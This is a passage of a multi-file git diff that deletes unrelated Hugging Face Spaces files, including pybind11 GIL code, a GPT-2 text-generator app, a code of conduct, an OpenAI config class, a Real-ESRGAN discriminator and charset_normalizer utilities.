false; - } - } - - PYBIND11_NOINLINE ~gil_scoped_acquire() { - dec_ref(); - if (release) - PyEval_SaveThread(); - } -private: - PyThreadState *tstate = nullptr; - bool release = true; -}; - -class gil_scoped_release { -public: - explicit gil_scoped_release(bool disassoc = false) : disassoc(disassoc) { - // `get_internals()` must be called here unconditionally in order to initialize - // `internals.tstate` for subsequent `gil_scoped_acquire` calls. Otherwise, an - // initialization race could occur as multiple threads try `gil_scoped_acquire`. 
- const auto &internals = detail::get_internals(); - tstate = PyEval_SaveThread(); - if (disassoc) { - auto key = internals.tstate; - PYBIND11_TLS_DELETE_VALUE(key); - } - } - ~gil_scoped_release() { - if (!tstate) - return; - PyEval_RestoreThread(tstate); - if (disassoc) { - auto key = detail::get_internals().tstate; - PYBIND11_TLS_REPLACE_VALUE(key, tstate); - } - } -private: - PyThreadState *tstate; - bool disassoc; -}; -#elif defined(PYPY_VERSION) -class gil_scoped_acquire { - PyGILState_STATE state; -public: - gil_scoped_acquire() { state = PyGILState_Ensure(); } - ~gil_scoped_acquire() { PyGILState_Release(state); } -}; - -class gil_scoped_release { - PyThreadState *state; -public: - gil_scoped_release() { state = PyEval_SaveThread(); } - ~gil_scoped_release() { PyEval_RestoreThread(state); } -}; -#else -class gil_scoped_acquire { }; -class gil_scoped_release { }; -#endif - -error_already_set::~error_already_set() { - if (m_type) { - gil_scoped_acquire gil; - error_scope scope; - m_type.release().dec_ref(); - m_value.release().dec_ref(); - m_trace.release().dec_ref(); - } -} - -inline function get_type_overload(const void *this_ptr, const detail::type_info *this_type, const char *name) { - handle self = detail::get_object_handle(this_ptr, this_type); - if (!self) - return function(); - handle type = self.get_type(); - auto key = std::make_pair(type.ptr(), name); - - /* Cache functions that aren't overloaded in Python to avoid - many costly Python dictionary lookups below */ - auto &cache = detail::get_internals().inactive_overload_cache; - if (cache.find(key) != cache.end()) - return function(); - - function overload = getattr(self, name, function()); - if (overload.is_cpp_function()) { - cache.insert(key); - return function(); - } - - /* Don't call dispatch code if invoked from overridden function. - Unfortunately this doesn't work on PyPy. 
*/ -#if !defined(PYPY_VERSION) - PyFrameObject *frame = PyThreadState_Get()->frame; - if (frame && (std::string) str(frame->f_code->co_name) == name && - frame->f_code->co_argcount > 0) { - PyFrame_FastToLocals(frame); - PyObject *self_caller = PyDict_GetItem( - frame->f_locals, PyTuple_GET_ITEM(frame->f_code->co_varnames, 0)); - if (self_caller == self.ptr()) - return function(); - } -#else - /* PyPy currently doesn't provide a detailed cpyext emulation of - frame objects, so we have to emulate this using Python. This - is going to be slow..*/ - dict d; d["self"] = self; d["name"] = pybind11::str(name); - PyObject *result = PyRun_String( - "import inspect\n" - "frame = inspect.currentframe()\n" - "if frame is not None:\n" - " frame = frame.f_back\n" - " if frame is not None and str(frame.f_code.co_name) == name and " - "frame.f_code.co_argcount > 0:\n" - " self_caller = frame.f_locals[frame.f_code.co_varnames[0]]\n" - " if self_caller == self:\n" - " self = None\n", - Py_file_input, d.ptr(), d.ptr()); - if (result == nullptr) - throw error_already_set(); - if (d["self"].is_none()) - return function(); - Py_DECREF(result); -#endif - - return overload; -} - -/** \rst - Try to retrieve a python method by the provided name from the instance pointed to by the this_ptr. - - :this_ptr: The pointer to the object the overload should be retrieved for. This should be the first - non-trampoline class encountered in the inheritance chain. - :name: The name of the overloaded Python method to retrieve. - :return: The Python method by this name from the object or an empty function wrapper. - \endrst */ -template function get_overload(const T *this_ptr, const char *name) { - auto tinfo = detail::get_type_info(typeid(T)); - return tinfo ? get_type_overload(this_ptr, tinfo, name) : function(); -} - -#define PYBIND11_OVERLOAD_INT(ret_type, cname, name, ...) 
{ \ - pybind11::gil_scoped_acquire gil; \ - pybind11::function overload = pybind11::get_overload(static_cast(this), name); \ - if (overload) { \ - auto o = overload(__VA_ARGS__); \ - if (pybind11::detail::cast_is_temporary_value_reference::value) { \ - static pybind11::detail::overload_caster_t caster; \ - return pybind11::detail::cast_ref(std::move(o), caster); \ - } \ - else return pybind11::detail::cast_safe(std::move(o)); \ - } \ - } - -/** \rst - Macro to populate the virtual method in the trampoline class. This macro tries to look up a method named 'fn' - from the Python side, deals with the :ref:`gil` and necessary argument conversions to call this method and return - the appropriate type. See :ref:`overriding_virtuals` for more information. This macro should be used when the method - name in C is not the same as the method name in Python. For example with `__str__`. - - .. code-block:: cpp - - std::string toString() override { - PYBIND11_OVERLOAD_NAME( - std::string, // Return type (ret_type) - Animal, // Parent class (cname) - "__str__", // Name of method in Python (name) - toString, // Name of function in C++ (fn) - ); - } -\endrst */ -#define PYBIND11_OVERLOAD_NAME(ret_type, cname, name, fn, ...) \ - PYBIND11_OVERLOAD_INT(PYBIND11_TYPE(ret_type), PYBIND11_TYPE(cname), name, __VA_ARGS__) \ - return cname::fn(__VA_ARGS__) - -/** \rst - Macro for pure virtual functions, this function is identical to :c:macro:`PYBIND11_OVERLOAD_NAME`, except that it - throws if no overload can be found. -\endrst */ -#define PYBIND11_OVERLOAD_PURE_NAME(ret_type, cname, name, fn, ...) \ - PYBIND11_OVERLOAD_INT(PYBIND11_TYPE(ret_type), PYBIND11_TYPE(cname), name, __VA_ARGS__) \ - pybind11::pybind11_fail("Tried to call pure virtual function \"" PYBIND11_STRINGIFY(cname) "::" name "\""); - -/** \rst - Macro to populate the virtual method in the trampoline class. 
This macro tries to look up the method - from the Python side, deals with the :ref:`gil` and necessary argument conversions to call this method and return - the appropriate type. This macro should be used if the method names in C++ and in Python are identical. - See :ref:`overriding_virtuals` for more information. - - .. code-block:: cpp - - class PyAnimal : public Animal { - public: - // Inherit the constructors - using Animal::Animal; - - // Trampoline (need one for each virtual function) - std::string go(int n_times) override { - PYBIND11_OVERLOAD_PURE( - std::string, // Return type (ret_type) - Animal, // Parent class (cname) - go, // Name of function in C++ (must match Python name) (fn) - n_times // Argument(s) (...) - ); - } - }; -\endrst */ -#define PYBIND11_OVERLOAD(ret_type, cname, fn, ...) \ - PYBIND11_OVERLOAD_NAME(PYBIND11_TYPE(ret_type), PYBIND11_TYPE(cname), #fn, fn, __VA_ARGS__) - -/** \rst - Macro for pure virtual functions, this function is identical to :c:macro:`PYBIND11_OVERLOAD`, except that it throws - if no overload can be found. -\endrst */ -#define PYBIND11_OVERLOAD_PURE(ret_type, cname, fn, ...)
\ - PYBIND11_OVERLOAD_PURE_NAME(PYBIND11_TYPE(ret_type), PYBIND11_TYPE(cname), #fn, fn, __VA_ARGS__) - -PYBIND11_NAMESPACE_END(PYBIND11_NAMESPACE) - -#if defined(_MSC_VER) && !defined(__INTEL_COMPILER) -# pragma warning(pop) -#elif defined(__GNUG__) && !defined(__clang__) -# pragma GCC diagnostic pop -#endif diff --git a/spaces/CVPR/lama-example/saicinpainting/evaluation/masks/__init__.py b/spaces/CVPR/lama-example/saicinpainting/evaluation/masks/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/Callimethee/Imagine-CR/app.py b/spaces/Callimethee/Imagine-CR/app.py deleted file mode 100644 index 76f7deaabe05a7abc167c71d5783087b189de24a..0000000000000000000000000000000000000000 --- a/spaces/Callimethee/Imagine-CR/app.py +++ /dev/null @@ -1,29 +0,0 @@ -from transformers import GPT2LMHeadModel, GPT2Tokenizer -import torch -import gradio as gr - -tokenizer = GPT2Tokenizer.from_pretrained("./") -model = GPT2LMHeadModel.from_pretrained("./") - - -def generator(input_string): - input_string = "<|startoftext|>" + " " * (input_string != "") + input_string - prompt = torch.tensor(tokenizer.encode(input_string)).unsqueeze(0) - - generated = model.generate( - prompt, - do_sample=True, - top_k=50, - max_length=1024, - top_p=0.95, - num_return_sequences=5, - ) - out = "" - for tirade in generated: - out += tokenizer.decode(tirade, skip_special_tokens=True) + "\n\n" - return out - -desc = "> Artificial Intelligence, Eh? Sounds fancy - but it'll never replace geniuses such as myself.\n\n - *Huron Stahlmast, Exiled Hupperdook Engineer*\n\n\nThis generator allows you to generate your own transcripts from an imaginary episode of Critical Role! Input the start of a tirade (or nothing!), and let the magic of machine learning do the rest!\n\nFor the curious among you, this uses a fine-tuned version of GPT2." 
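The prompt construction in `generator` above relies on Python's bool-to-int coercion: multiplying a string by `False` yields the empty string, so the separator space is inserted only for non-empty input. A standalone sketch of that idiom (the function name is illustrative, not part of the original app):

```python
def build_prompt(user_text: str) -> str:
    # " " * True == " " and " " * False == "", so the separator space is
    # added only when the user actually typed something.
    return "<|startoftext|>" + " " * (user_text != "") + user_text

print(build_prompt(""))       # <|startoftext|>
print(build_prompt("MATT:"))  # <|startoftext|> MATT:
```

An explicit conditional would read more clearly, but the multiplication trick keeps the expression on one line, which is presumably why it was used.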
- -demo = gr.Interface(fn=generator, inputs="textbox", outputs="textbox", title="Critical Role Text Generator", examples=[["MATT:"], ["LAURA: I cast"]], description=desc) -demo.launch() diff --git a/spaces/Caoyunkang/Segment-Any-Anomaly/SAM/CODE_OF_CONDUCT.md b/spaces/Caoyunkang/Segment-Any-Anomaly/SAM/CODE_OF_CONDUCT.md deleted file mode 100644 index 08b500a221857ec3f451338e80b4a9ab1173a1af..0000000000000000000000000000000000000000 --- a/spaces/Caoyunkang/Segment-Any-Anomaly/SAM/CODE_OF_CONDUCT.md +++ /dev/null @@ -1,80 +0,0 @@ -# Code of Conduct - -## Our Pledge - -In the interest of fostering an open and welcoming environment, we as -contributors and maintainers pledge to make participation in our project and -our community a harassment-free experience for everyone, regardless of age, body -size, disability, ethnicity, sex characteristics, gender identity and expression, -level of experience, education, socio-economic status, nationality, personal -appearance, race, religion, or sexual identity and orientation. 
- -## Our Standards - -Examples of behavior that contributes to creating a positive environment -include: - -* Using welcoming and inclusive language -* Being respectful of differing viewpoints and experiences -* Gracefully accepting constructive criticism -* Focusing on what is best for the community -* Showing empathy towards other community members - -Examples of unacceptable behavior by participants include: - -* The use of sexualized language or imagery and unwelcome sexual attention or - advances -* Trolling, insulting/derogatory comments, and personal or political attacks -* Public or private harassment -* Publishing others' private information, such as a physical or electronic - address, without explicit permission -* Other conduct which could reasonably be considered inappropriate in a - professional setting - -## Our Responsibilities - -Project maintainers are responsible for clarifying the standards of acceptable -behavior and are expected to take appropriate and fair corrective action in -response to any instances of unacceptable behavior. - -Project maintainers have the right and responsibility to remove, edit, or -reject comments, commits, code, wiki edits, issues, and other contributions -that are not aligned to this Code of Conduct, or to ban temporarily or -permanently any contributor for other behaviors that they deem inappropriate, -threatening, offensive, or harmful. - -## Scope - -This Code of Conduct applies within all project spaces, and it also applies when -an individual is representing the project or its community in public spaces. -Examples of representing a project or community include using an official -project e-mail address, posting via an official social media account, or acting -as an appointed representative at an online or offline event. Representation of -a project may be further defined and clarified by project maintainers. 
- -This Code of Conduct also applies outside the project spaces when there is a -reasonable belief that an individual's behavior may have a negative impact on -the project or its community. - -## Enforcement - -Instances of abusive, harassing, or otherwise unacceptable behavior may be -reported by contacting the project team at . All -complaints will be reviewed and investigated and will result in a response that -is deemed necessary and appropriate to the circumstances. The project team is -obligated to maintain confidentiality with regard to the reporter of an incident. -Further details of specific enforcement policies may be posted separately. - -Project maintainers who do not follow or enforce the Code of Conduct in good -faith may face temporary or permanent repercussions as determined by other -members of the project's leadership. - -## Attribution - -This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, -available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html - -[homepage]: https://www.contributor-covenant.org - -For answers to common questions about this code of conduct, see -https://www.contributor-covenant.org/faq diff --git a/spaces/Cloudyy/bark-voice-cloning/hubert/__init__.py b/spaces/Cloudyy/bark-voice-cloning/hubert/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/CognitiveLabs/Research-Assistant/config/config.py b/spaces/CognitiveLabs/Research-Assistant/config/config.py deleted file mode 100644 index 97f1d2190585b966e70d5280d968330cd5aec932..0000000000000000000000000000000000000000 --- a/spaces/CognitiveLabs/Research-Assistant/config/config.py +++ /dev/null @@ -1,82 +0,0 @@ -"""Configuration class to store the state of bools for different scripts access.""" -import os - -import openai -from colorama import Fore -from dotenv import load_dotenv - -from config.singleton import Singleton - 
-load_dotenv(verbose=True) - - -class Config(metaclass=Singleton): - """ - Configuration class to store the state of bools for different scripts access. - """ - - def __init__(self) -> None: - """Initialize the Config class""" - self.debug_mode = False - self.allow_downloads = False - - self.selenium_web_browser = os.getenv("USE_WEB_BROWSER", "chrome") - self.fast_llm_model = os.getenv("FAST_LLM_MODEL", "gpt-3.5-turbo") - self.smart_llm_model = os.getenv("SMART_LLM_MODEL", "gpt-4") - self.fast_token_limit = int(os.getenv("FAST_TOKEN_LIMIT", 8000)) - self.smart_token_limit = int(os.getenv("SMART_TOKEN_LIMIT", 8000)) - self.browse_chunk_max_length = int(os.getenv("BROWSE_CHUNK_MAX_LENGTH", 8192)) - - self.openai_api_key = os.getenv("OPENAI_API_KEY") - self.openai_api_base = os.getenv("OPENAI_API_BASE", openai.api_base) - self.temperature = float(os.getenv("TEMPERATURE", "1")) - - self.user_agent = os.getenv( - "USER_AGENT", - "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36" - " (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36", - ) - - self.memory_backend = os.getenv("MEMORY_BACKEND", "local") - # Initialize the OpenAI API client - openai.api_key = self.openai_api_key - - def set_fast_llm_model(self, value: str) -> None: - """Set the fast LLM model value.""" - self.fast_llm_model = value - - def set_smart_llm_model(self, value: str) -> None: - """Set the smart LLM model value.""" - self.smart_llm_model = value - - def set_fast_token_limit(self, value: int) -> None: - """Set the fast token limit value.""" - self.fast_token_limit = value - - def set_smart_token_limit(self, value: int) -> None: - """Set the smart token limit value.""" - self.smart_token_limit = value - - def set_browse_chunk_max_length(self, value: int) -> None: - """Set the browse_website command chunk max length value.""" - self.browse_chunk_max_length = value - - def set_openai_api_key(self, value: str) -> None: - """Set the OpenAI API key value.""" - self.openai_api_key = 
value - - def set_debug_mode(self, value: bool) -> None: - """Set the debug mode value.""" - self.debug_mode = value - - -def check_openai_api_key() -> None: - """Check if the OpenAI API key is set in config.py or as an environment variable.""" - cfg = Config() - if not cfg.openai_api_key: - print( - Fore.RED - + "Please set your OpenAI API key in .env or as an environment variable." - ) - print("You can get your key from https://platform.openai.com/account/api-keys") - exit(1) diff --git a/spaces/CoreyMorris/MMLU-by-task-Leaderboard/test_paths.py b/spaces/CoreyMorris/MMLU-by-task-Leaderboard/test_paths.py deleted file mode 100644 index 547434b5d97d9a931cac6a05630e147b1924dc05..0000000000000000000000000000000000000000 --- a/spaces/CoreyMorris/MMLU-by-task-Leaderboard/test_paths.py +++ /dev/null @@ -1,19 +0,0 @@ -import unittest -import os - -class TestPaths(unittest.TestCase): - def test_path_exists(self): - # test that the path 'results' exists - self.assertTrue(os.path.exists('results')) - - def test_results_directory_is_not_empty(self): - # test that the results directory is not empty - self.assertGreater(len(os.listdir('results')), 0) - - def test_results_contain_json_files(self): - # test that the results directory contains json files in the subdirectories - # get a list of all the subdirectories - subdirectories = [x[0] for x in os.walk('results')] - # check if the subdirectories contain json files.
only check one subdirectory - subdirectory = subdirectories[1] - self.assertGreater(len(os.listdir(subdirectory)), 0) \ No newline at end of file diff --git a/spaces/CrucibleAI/ControlNetMediaPipeFaceSD21/ldm/data/util.py b/spaces/CrucibleAI/ControlNetMediaPipeFaceSD21/ldm/data/util.py deleted file mode 100644 index 5b60ceb2349e3bd7900ff325740e2022d2903b1c..0000000000000000000000000000000000000000 --- a/spaces/CrucibleAI/ControlNetMediaPipeFaceSD21/ldm/data/util.py +++ /dev/null @@ -1,24 +0,0 @@ -import torch - -from ldm.modules.midas.api import load_midas_transform - - -class AddMiDaS(object): - def __init__(self, model_type): - super().__init__() - self.transform = load_midas_transform(model_type) - - def pt2np(self, x): - x = ((x + 1.0) * .5).detach().cpu().numpy() - return x - - def np2pt(self, x): - x = torch.from_numpy(x) * 2 - 1. - return x - - def __call__(self, sample): - # sample['jpg'] is tensor hwc in [-1, 1] at this point - x = self.pt2np(sample['jpg']) - x = self.transform({"image": x})["image"] - sample['midas_in'] = x - return sample \ No newline at end of file diff --git a/spaces/Cvandi/remake/realesrgan/archs/discriminator_arch.py b/spaces/Cvandi/remake/realesrgan/archs/discriminator_arch.py deleted file mode 100644 index 4b66ab1226d6793de846bc9828bbe427031a0e2d..0000000000000000000000000000000000000000 --- a/spaces/Cvandi/remake/realesrgan/archs/discriminator_arch.py +++ /dev/null @@ -1,67 +0,0 @@ -from basicsr.utils.registry import ARCH_REGISTRY -from torch import nn as nn -from torch.nn import functional as F -from torch.nn.utils import spectral_norm - - -@ARCH_REGISTRY.register() -class UNetDiscriminatorSN(nn.Module): - """Defines a U-Net discriminator with spectral normalization (SN) - - It is used in Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data. - - Arg: - num_in_ch (int): Channel number of inputs. Default: 3. - num_feat (int): Channel number of base intermediate features. Default: 64. 
- skip_connection (bool): Whether to use skip connections between U-Net. Default: True. - """ - - def __init__(self, num_in_ch, num_feat=64, skip_connection=True): - super(UNetDiscriminatorSN, self).__init__() - self.skip_connection = skip_connection - norm = spectral_norm - # the first convolution - self.conv0 = nn.Conv2d(num_in_ch, num_feat, kernel_size=3, stride=1, padding=1) - # downsample - self.conv1 = norm(nn.Conv2d(num_feat, num_feat * 2, 4, 2, 1, bias=False)) - self.conv2 = norm(nn.Conv2d(num_feat * 2, num_feat * 4, 4, 2, 1, bias=False)) - self.conv3 = norm(nn.Conv2d(num_feat * 4, num_feat * 8, 4, 2, 1, bias=False)) - # upsample - self.conv4 = norm(nn.Conv2d(num_feat * 8, num_feat * 4, 3, 1, 1, bias=False)) - self.conv5 = norm(nn.Conv2d(num_feat * 4, num_feat * 2, 3, 1, 1, bias=False)) - self.conv6 = norm(nn.Conv2d(num_feat * 2, num_feat, 3, 1, 1, bias=False)) - # extra convolutions - self.conv7 = norm(nn.Conv2d(num_feat, num_feat, 3, 1, 1, bias=False)) - self.conv8 = norm(nn.Conv2d(num_feat, num_feat, 3, 1, 1, bias=False)) - self.conv9 = nn.Conv2d(num_feat, 1, 3, 1, 1) - - def forward(self, x): - # downsample - x0 = F.leaky_relu(self.conv0(x), negative_slope=0.2, inplace=True) - x1 = F.leaky_relu(self.conv1(x0), negative_slope=0.2, inplace=True) - x2 = F.leaky_relu(self.conv2(x1), negative_slope=0.2, inplace=True) - x3 = F.leaky_relu(self.conv3(x2), negative_slope=0.2, inplace=True) - - # upsample - x3 = F.interpolate(x3, scale_factor=2, mode='bilinear', align_corners=False) - x4 = F.leaky_relu(self.conv4(x3), negative_slope=0.2, inplace=True) - - if self.skip_connection: - x4 = x4 + x2 - x4 = F.interpolate(x4, scale_factor=2, mode='bilinear', align_corners=False) - x5 = F.leaky_relu(self.conv5(x4), negative_slope=0.2, inplace=True) - - if self.skip_connection: - x5 = x5 + x1 - x5 = F.interpolate(x5, scale_factor=2, mode='bilinear', align_corners=False) - x6 = F.leaky_relu(self.conv6(x5), negative_slope=0.2, inplace=True) - - if self.skip_connection: - x6 
= x6 + x0 - - # extra convolutions - out = F.leaky_relu(self.conv7(x6), negative_slope=0.2, inplace=True) - out = F.leaky_relu(self.conv8(out), negative_slope=0.2, inplace=True) - out = self.conv9(out) - - return out diff --git a/spaces/DAMO-NLP-SG/Video-LLaMA/README.md b/spaces/DAMO-NLP-SG/Video-LLaMA/README.md deleted file mode 100644 index 7e48edc1fcbd340725978ff41afa3ebd192d1db5..0000000000000000000000000000000000000000 --- a/spaces/DAMO-NLP-SG/Video-LLaMA/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Video LLaMA -emoji: 🚀 -colorFrom: purple -colorTo: gray -sdk: gradio -sdk_version: 3.29.0 -app_file: app.py -pinned: false -license: other ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference - diff --git a/spaces/DHEIVER/timeseries-anomaly-detection-autoencoders/README.md b/spaces/DHEIVER/timeseries-anomaly-detection-autoencoders/README.md deleted file mode 100644 index 0993b27a77b69db8c6c13721e06c15ef5c1b756d..0000000000000000000000000000000000000000 --- a/spaces/DHEIVER/timeseries-anomaly-detection-autoencoders/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Timeseries Anomaly Detection -emoji: 🌍 -colorFrom: blue -colorTo: indigo -sdk: gradio -sdk_version: 3.0.1 -app_file: app.py -pinned: false -duplicated_from: keras-io/timeseries-anomaly-detection-autoencoders ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/charset_normalizer/utils.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/charset_normalizer/utils.py deleted file mode 100644 index bf2767a0e6022c52690cdabf684b0b676ed0eadc..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/charset_normalizer/utils.py +++ /dev/null @@ -1,414 +0,0 @@ -import importlib -import logging -import unicodedata -from codecs import IncrementalDecoder -from encodings.aliases 
import aliases -from functools import lru_cache -from re import findall -from typing import Generator, List, Optional, Set, Tuple, Union - -from _multibytecodec import MultibyteIncrementalDecoder - -from .constant import ( - ENCODING_MARKS, - IANA_SUPPORTED_SIMILAR, - RE_POSSIBLE_ENCODING_INDICATION, - UNICODE_RANGES_COMBINED, - UNICODE_SECONDARY_RANGE_KEYWORD, - UTF8_MAXIMAL_ALLOCATION, -) - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_accentuated(character: str) -> bool: - try: - description: str = unicodedata.name(character) - except ValueError: - return False - return ( - "WITH GRAVE" in description - or "WITH ACUTE" in description - or "WITH CEDILLA" in description - or "WITH DIAERESIS" in description - or "WITH CIRCUMFLEX" in description - or "WITH TILDE" in description - ) - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def remove_accent(character: str) -> str: - decomposed: str = unicodedata.decomposition(character) - if not decomposed: - return character - - codes: List[str] = decomposed.split(" ") - - return chr(int(codes[0], 16)) - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def unicode_range(character: str) -> Optional[str]: - """ - Retrieve the Unicode range official name from a single character. 
- """ - character_ord: int = ord(character) - - for range_name, ord_range in UNICODE_RANGES_COMBINED.items(): - if character_ord in ord_range: - return range_name - - return None - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_latin(character: str) -> bool: - try: - description: str = unicodedata.name(character) - except ValueError: - return False - return "LATIN" in description - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_ascii(character: str) -> bool: - try: - character.encode("ascii") - except UnicodeEncodeError: - return False - return True - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_punctuation(character: str) -> bool: - character_category: str = unicodedata.category(character) - - if "P" in character_category: - return True - - character_range: Optional[str] = unicode_range(character) - - if character_range is None: - return False - - return "Punctuation" in character_range - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_symbol(character: str) -> bool: - character_category: str = unicodedata.category(character) - - if "S" in character_category or "N" in character_category: - return True - - character_range: Optional[str] = unicode_range(character) - - if character_range is None: - return False - - return "Forms" in character_range - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_emoticon(character: str) -> bool: - character_range: Optional[str] = unicode_range(character) - - if character_range is None: - return False - - return "Emoticons" in character_range - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_separator(character: str) -> bool: - if character.isspace() or character in {"|", "+", "<", ">"}: - return True - - character_category: str = unicodedata.category(character) - - return "Z" in character_category or character_category in {"Po", "Pd", "Pc"} - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_case_variable(character: str) -> bool: - return character.islower() != character.isupper() 
- - -def is_private_use_only(character: str) -> bool: - character_category: str = unicodedata.category(character) - - return character_category == "Co" - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_cjk(character: str) -> bool: - try: - character_name = unicodedata.name(character) - except ValueError: - return False - - return "CJK" in character_name - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_hiragana(character: str) -> bool: - try: - character_name = unicodedata.name(character) - except ValueError: - return False - - return "HIRAGANA" in character_name - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_katakana(character: str) -> bool: - try: - character_name = unicodedata.name(character) - except ValueError: - return False - - return "KATAKANA" in character_name - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_hangul(character: str) -> bool: - try: - character_name = unicodedata.name(character) - except ValueError: - return False - - return "HANGUL" in character_name - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_thai(character: str) -> bool: - try: - character_name = unicodedata.name(character) - except ValueError: - return False - - return "THAI" in character_name - - -@lru_cache(maxsize=len(UNICODE_RANGES_COMBINED)) -def is_unicode_range_secondary(range_name: str) -> bool: - return any(keyword in range_name for keyword in UNICODE_SECONDARY_RANGE_KEYWORD) - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_unprintable(character: str) -> bool: - return ( - character.isspace() is False # includes \n \t \r \v - and character.isprintable() is False - and character != "\x1A" # Why? Its the ASCII substitute character. - and character != "\ufeff" # bug discovered in Python, - # Zero Width No-Break Space located in Arabic Presentation Forms-B, Unicode 1.1 not acknowledged as space. 
- ) - - -def any_specified_encoding(sequence: bytes, search_zone: int = 4096) -> Optional[str]: - """ - Extract using ASCII-only decoder any specified encoding in the first n-bytes. - """ - if not isinstance(sequence, bytes): - raise TypeError - - seq_len: int = len(sequence) - - results: List[str] = findall( - RE_POSSIBLE_ENCODING_INDICATION, - sequence[: min(seq_len, search_zone)].decode("ascii", errors="ignore"), - ) - - if len(results) == 0: - return None - - for specified_encoding in results: - specified_encoding = specified_encoding.lower().replace("-", "_") - - encoding_alias: str - encoding_iana: str - - for encoding_alias, encoding_iana in aliases.items(): - if encoding_alias == specified_encoding: - return encoding_iana - if encoding_iana == specified_encoding: - return encoding_iana - - return None - - -@lru_cache(maxsize=128) -def is_multi_byte_encoding(name: str) -> bool: - """ - Verify whether a specific encoding is a multi-byte one based on its IANA name - """ - return name in { - "utf_8", - "utf_8_sig", - "utf_16", - "utf_16_be", - "utf_16_le", - "utf_32", - "utf_32_le", - "utf_32_be", - "utf_7", - } or issubclass( - importlib.import_module("encodings.{}".format(name)).IncrementalDecoder, - MultibyteIncrementalDecoder, - ) - - -def identify_sig_or_bom(sequence: bytes) -> Tuple[Optional[str], bytes]: - """ - Identify and extract SIG/BOM in given sequence.
- """ - - for iana_encoding in ENCODING_MARKS: - marks: Union[bytes, List[bytes]] = ENCODING_MARKS[iana_encoding] - - if isinstance(marks, bytes): - marks = [marks] - - for mark in marks: - if sequence.startswith(mark): - return iana_encoding, mark - - return None, b"" - - -def should_strip_sig_or_bom(iana_encoding: str) -> bool: - return iana_encoding not in {"utf_16", "utf_32"} - - -def iana_name(cp_name: str, strict: bool = True) -> str: - cp_name = cp_name.lower().replace("-", "_") - - encoding_alias: str - encoding_iana: str - - for encoding_alias, encoding_iana in aliases.items(): - if cp_name in [encoding_alias, encoding_iana]: - return encoding_iana - - if strict: - raise ValueError("Unable to retrieve IANA for '{}'".format(cp_name)) - - return cp_name - - -def range_scan(decoded_sequence: str) -> List[str]: - ranges: Set[str] = set() - - for character in decoded_sequence: - character_range: Optional[str] = unicode_range(character) - - if character_range is None: - continue - - ranges.add(character_range) - - return list(ranges) - - -def cp_similarity(iana_name_a: str, iana_name_b: str) -> float: - if is_multi_byte_encoding(iana_name_a) or is_multi_byte_encoding(iana_name_b): - return 0.0 - - decoder_a = importlib.import_module( - "encodings.{}".format(iana_name_a) - ).IncrementalDecoder - decoder_b = importlib.import_module( - "encodings.{}".format(iana_name_b) - ).IncrementalDecoder - - id_a: IncrementalDecoder = decoder_a(errors="ignore") - id_b: IncrementalDecoder = decoder_b(errors="ignore") - - character_match_count: int = 0 - - for i in range(255): - to_be_decoded: bytes = bytes([i]) - if id_a.decode(to_be_decoded) == id_b.decode(to_be_decoded): - character_match_count += 1 - - return character_match_count / 254 - - -def is_cp_similar(iana_name_a: str, iana_name_b: str) -> bool: - """ - Determine if two code page are at least 80% similar. IANA_SUPPORTED_SIMILAR dict was generated using - the function cp_similarity. 
- """ - return ( - iana_name_a in IANA_SUPPORTED_SIMILAR - and iana_name_b in IANA_SUPPORTED_SIMILAR[iana_name_a] - ) - - -def set_logging_handler( - name: str = "charset_normalizer", - level: int = logging.INFO, - format_string: str = "%(asctime)s | %(levelname)s | %(message)s", -) -> None: - logger = logging.getLogger(name) - logger.setLevel(level) - - handler = logging.StreamHandler() - handler.setFormatter(logging.Formatter(format_string)) - logger.addHandler(handler) - - -def cut_sequence_chunks( - sequences: bytes, - encoding_iana: str, - offsets: range, - chunk_size: int, - bom_or_sig_available: bool, - strip_sig_or_bom: bool, - sig_payload: bytes, - is_multi_byte_decoder: bool, - decoded_payload: Optional[str] = None, -) -> Generator[str, None, None]: - if decoded_payload and is_multi_byte_decoder is False: - for i in offsets: - chunk = decoded_payload[i : i + chunk_size] - if not chunk: - break - yield chunk - else: - for i in offsets: - chunk_end = i + chunk_size - if chunk_end > len(sequences) + 8: - continue - - cut_sequence = sequences[i : i + chunk_size] - - if bom_or_sig_available and strip_sig_or_bom is False: - cut_sequence = sig_payload + cut_sequence - - chunk = cut_sequence.decode( - encoding_iana, - errors="ignore" if is_multi_byte_decoder else "strict", - ) - - # multi-byte bad cutting detector and adjustment - # not the cleanest way to perform that fix but clever enough for now. 
